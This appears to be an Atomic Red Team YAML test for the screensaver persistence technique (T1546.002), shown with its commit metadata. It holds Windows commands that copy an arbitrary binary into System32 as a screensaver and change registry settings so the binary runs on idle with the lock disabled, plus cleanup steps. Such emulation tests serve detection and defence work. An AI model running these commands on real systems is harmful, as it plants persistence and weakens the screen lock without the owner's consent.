Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
34 lines
1.6 KiB
YAML
34 lines
1.6 KiB
YAML
attack_technique: T1546.002
|
|
display_name: 'Event Triggered Execution: Screensaver'
|
|
atomic_tests:
|
|
- name: Set Arbitrary Binary as Screensaver
|
|
auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64
|
|
description: |
|
|
This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
input_binary:
|
|
description: Executable binary to use in place of screensaver for persistence
|
|
type: path
|
|
default: C:\Windows\System32\cmd.exe
|
|
reboot:
|
|
description: Set to non-zero value if you want the test to reboot the system so that changes take effect
|
|
type: integer
|
|
default: 0
|
|
executor:
|
|
command: |
|
|
reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
|
|
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
|
|
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
|
|
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
|
|
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
|
|
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
|
|
if #{reboot} NEQ 0 shutdown /r /t 0
|
|
cleanup_command: |
|
|
reg import %userprofile%\backup.reg
|
|
del %userprofile%\backup.reg
|
|
del %SystemRoot%\System32\evilscreensaver.scr
|
|
name: command_prompt
|
|
elevation_required: true
|